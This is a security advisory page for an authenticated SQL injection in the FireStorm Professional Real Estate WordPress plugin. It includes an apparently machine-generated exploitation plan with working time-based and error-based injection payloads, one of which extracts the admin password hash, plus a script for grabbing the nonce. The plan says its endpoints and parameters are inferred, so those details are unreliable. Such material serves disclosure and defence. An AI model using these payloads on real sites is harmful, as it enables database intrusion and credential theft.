FireStorm Professional Real Estate <= 2.7.11 - Authenticated (Administrator+) SQL Injection
Description
The FireStorm Professional Real Estate plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.7.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:NTechnical Details
<=2.7.11# Exploitation Research Plan - CVE-2026-22470 ## 1. Vulnerability Summary The **FireStorm Professional Real Estate** plugin for WordPress (versions <= 2.7.11) is vulnerable to an **Authenticated SQL Injection** (Administrator+). The vulnerability exists due to the plugin's failure to use `$wpdb->pr…
Show full research plan
Exploitation Research Plan - CVE-2026-22470
1. Vulnerability Summary
The FireStorm Professional Real Estate plugin for WordPress (versions <= 2.7.11) is vulnerable to an **Authenticated SQL Injection** (Administrator+). The vulnerability exists due to the plugin's failure to use $wpdb->prepare() or adequate escaping (like absint() or esc_sql()) on user-supplied parameters before incorporating them into SQL queries. Although it requires high privileges (Administrator), it allows for the extraction of sensitive database information, including password hashes from the wp_users table or sensitive configuration data from wp_options.
2. Attack Vector Analysis
- Endpoint:
wp-admin/admin-ajax.phpor an admin page viawp-admin/admin.php. - Action/Hook: Likely a
wp_ajax_handler used for property management, listing filtering, or a dashboard view registered viaadd_menu_page. - Vulnerable Parameter: (Inferred) Likely an
id,listing_id,orderby, orsearchparameter within an administrative management function. - Authentication: Requires an active session with Administrator (or higher) capabilities.
- Preconditions: The plugin must be active. The attacker must have a valid administrator login.
3. Code Flow
Since source files were not provided, the following flow is inferred based on common patterns in the "fs-real-estate-plugin" slug:
- Entry Point: An administrator interacts with the "Properties" or "Listings" menu in the WordPress dashboard.
- Request: The browser sends a request to
wp-admin/admin.php?page=firestorm-real-estate-listings&property_id=[PAYLOAD]or an AJAX request withaction=fs_get_listing_details&id=[PAYLOAD]. - Handler Registration: The plugin registers an admin menu callback (e.g.,
add_submenu_page(..., 'fs_property_listings_callback')) or an AJAX action (add_action('wp_ajax_fs_manage_listing', ...)). - Data Processing: The handler retrieves input via
$_GET['id']or$_POST['property_id']. - SQL Sink: The input is concatenated directly into a query:
$property_id = $_GET['id']; // Missing sanitization $results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}fs_properties WHERE id = " . $property_id); - Execution:
$wpdb->get_results()executes the tainted query against the database.
4. Nonce Acquisition Strategy
Administrative actions in FireStorm are likely protected by WordPress nonces.
- Identify Shortcode/Admin Page: Navigate to the main listing page.
wp-admin/admin.php?page=fs-real-estate-properties(inferred slug).
- Navigate and Extract:
- Use
browser_navigateto load the admin listing page. - The plugin likely localizes script data. Check for a variable like
fs_admin_paramsorfs_ajax_nonce.
- Use
- Verification Tooling:
- Execute JS via
browser_eval:// Common pattern for this plugin's localization window.fs_real_estate_admin?.nonce || document.querySelector('input[name="fs_nonce"]')?.value || document.querySelector('#_wpnonce')?.value
- Execute JS via
- Note: If the vulnerability is in a
GETrequest on an admin page that doesn't verify nonces (common in "read" operations), this step may be bypassed.
5. Exploitation Strategy
We will use Error-Based SQL Injection (using updatexml) or UNION-Based Extraction if the results are reflected.
Step 1: Authentication
Login as an administrator and store cookies.
# Handled by the execution agent's environment
Step 2: Determine Injection Point
Test for a basic time-delay to confirm the sink.
- Target URL:
http://localhost:8080/wp-admin/admin-ajax.php - Method: POST
- Payload:
action=fs_manage_listing&id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)
Step 3: Extract Sensitive Data (PoC)
Using updatexml to leak the database version.
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=fs_manage_listing&id=1 AND updatexml(1,concat(0x7e,@@version),1)&_wpnonce=[NONCE]
Step 4: Extract Admin Password Hash
- Payload:
1 AND updatexml(1,concat(0x7e,(SELECT SUBSTRING(user_pass,1,30) FROM wp_users WHERE ID=1)),1)
6. Test Data Setup
- Plugin Installation: Ensure
fs-real-estate-pluginis installed and active. - Listing Creation: Add at least one property listing to the database to ensure the query returns data if needed.
wp post create --post_type=fs_property --post_title="Test Property" --post_status=publish - User Creation: Ensure an administrator user exists.
wp user create attacker admin@example.com --role=administrator --user_pass=password
7. Expected Results
- Time-based: The HTTP response should be delayed by exactly 5 seconds.
- Error-based: The response body should contain a database error message such as:
XPATH syntax error: '~10.6.18-MariaDB'(indicating the version). - Data Extraction: The first 30 characters of the admin's password hash will be visible in the error message.
8. Verification Steps
After performing the HTTP request, verify the version or data using wp-cli:
# Verify DB version matches the leaked version
wp db query "SELECT VERSION();"
# Verify the password hash matches the leaked hash
wp db query "SELECT user_pass FROM wp_users WHERE ID=1;"
9. Alternative Approaches
- Blind Boolean: If errors are suppressed, use
AND 1=1andAND 1=2and observe differences in the property listing table or AJAX response. - ORDER BY Injection: If the
idparameter is safe, check theorderbyparameter:orderby=(SELECT 1 FROM (SELECT(SLEEP(5)))a) - Page Slug: If
admin-ajax.phpis not the entry point, checkwp-admin/admin.php?page=firestorm_settings&id=1'. (Verify the page slug viawp plugin get fs-real-estate-plugin).
Summary
The FireStorm Professional Real Estate plugin for WordPress is vulnerable to authenticated SQL injection in versions up to and including 2.7.11 due to the improper handling of user-supplied parameters in administrative database queries. This vulnerability allows an attacker with administrator-level access to execute arbitrary SQL commands, potentially leading to the extraction of sensitive information such as user password hashes from the database.
Exploit Outline
To exploit this vulnerability, an attacker must be authenticated as an Administrator. The attack involves targeting an administrative endpoint, typically `wp-admin/admin-ajax.php` or an admin settings page, that accepts parameters (such as an 'id') used in SQL queries without sanitization. By injecting a crafted payload, such as `1 AND updatexml(1,concat(0x7e,@@version),1)`, into the vulnerable parameter, the attacker can leverage error-based or time-based injection to leak sensitive data. If security nonces are utilized by the plugin, the attacker must first retrieve a valid nonce from the dashboard's page source before submitting the malicious request.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.